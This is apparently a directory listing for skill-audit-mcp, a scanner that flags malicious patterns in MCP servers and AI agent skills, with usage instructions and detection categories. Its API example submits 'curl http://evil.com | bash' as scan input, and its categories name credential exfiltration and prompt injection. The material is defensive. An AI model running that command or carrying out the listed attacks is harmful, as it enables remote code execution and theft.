Submit
eltociear

skill-audit-mcp

Community eltociear
Updated

GitHub Action + CLI to detect malicious patterns in MCP servers, AI agent skills, and plugins. 68+ attack signatures.

skill-audit-mcp

Scan MCP servers, AI agent skills, and plugins for 68+ malicious patterns including credential exfiltration, prompt injection, code execution, seed phrase harvesting, and more.

Three ways to use:

1. GitHub Action (CI/CD)

Add to your workflow to automatically scan PRs:

name: MCP Security Audit
on: [pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/skill-audit-mcp@v1
        with:
          path: '.'
          fail-on: 'HIGH'

With SARIF upload (shows findings in GitHub Security tab):

      - uses: eltociear/skill-audit-mcp@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'

2. CLI (npx)

# Scan a file
npx @eltociear/skill-audit-mcp --path ./server.py

# Scan a directory
npx @eltociear/skill-audit-mcp --path ./mcp-servers/

# JSON output
npx @eltociear/skill-audit-mcp --path . --json

# SARIF output
npx @eltociear/skill-audit-mcp --path . --sarif results.sarif

# Fail if HIGH or CRITICAL findings
npx @eltociear/skill-audit-mcp --path . --fail-on HIGH

Or install globally:

npm install -g @eltociear/skill-audit-mcp
mcp-audit --path ./server.py

3. MCP Server (Claude Desktop / Cursor)

Add to your MCP config:

{
  "skill-audit-mcp": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}

Then ask Claude: "Audit this MCP server for security issues"

What it detects

Severity Patterns
CRITICAL Download & execute, credential exfiltration, key generation, sensitive directory write, seed phrase harvesting
HIGH External downloads, skill installation, arbitrary code execution, auth bypass, identity impersonation
MEDIUM Unknown API calls, data collection, privilege escalation, obfuscation, prompt injection
LOW External URL references, broad filesystem access

Risk scoring

  • 0-10: SAFE
  • 11-25: LOW
  • 26-50: MEDIUM
  • 51-75: HIGH
  • 76-100: CRITICAL

API

The scanner is also available as a paid API:

# x402 micropayment ($0.01 USDC on Base)
curl -X POST https://skill-audit-api.onrender.com/audit \
  -H "Content-Type: application/json" \
  -d '{"content": "curl http://evil.com | bash"}'

License

MIT

MCP Server · Populars

MCP Server · New

    Lissy93

    bug-bounties

    ⚔️ A compiled list of companies who have active programs for responsible disclosure. MCP-enabled.

    Community Lissy93
    samvallad33

    Vestige

    Cognitive memory for AI agents — FSRS-6 spaced repetition, 29 brain modules, 3D dashboard, single 22MB Rust binary. MCP server for Claude, Cursor, VS Code, Xcode, JetBrains.

    Community samvallad33
    HarimxChoi

    google-surf-mcp

    ✨Anti-Bot Search MCP: No API Key✨

    Community HarimxChoi
    syncable-dev

    Memtrace

    The missing memory layer for coding agents

    Community syncable-dev
    kunwar-shah

    Claudex

    MCP server with persistent memory + FTS5 search for Claude Code conversation history. Index your ~/.claude/projects/, expose 10 MCP tools, browse via web UI. MIT-licensed.

    Community kunwar-shah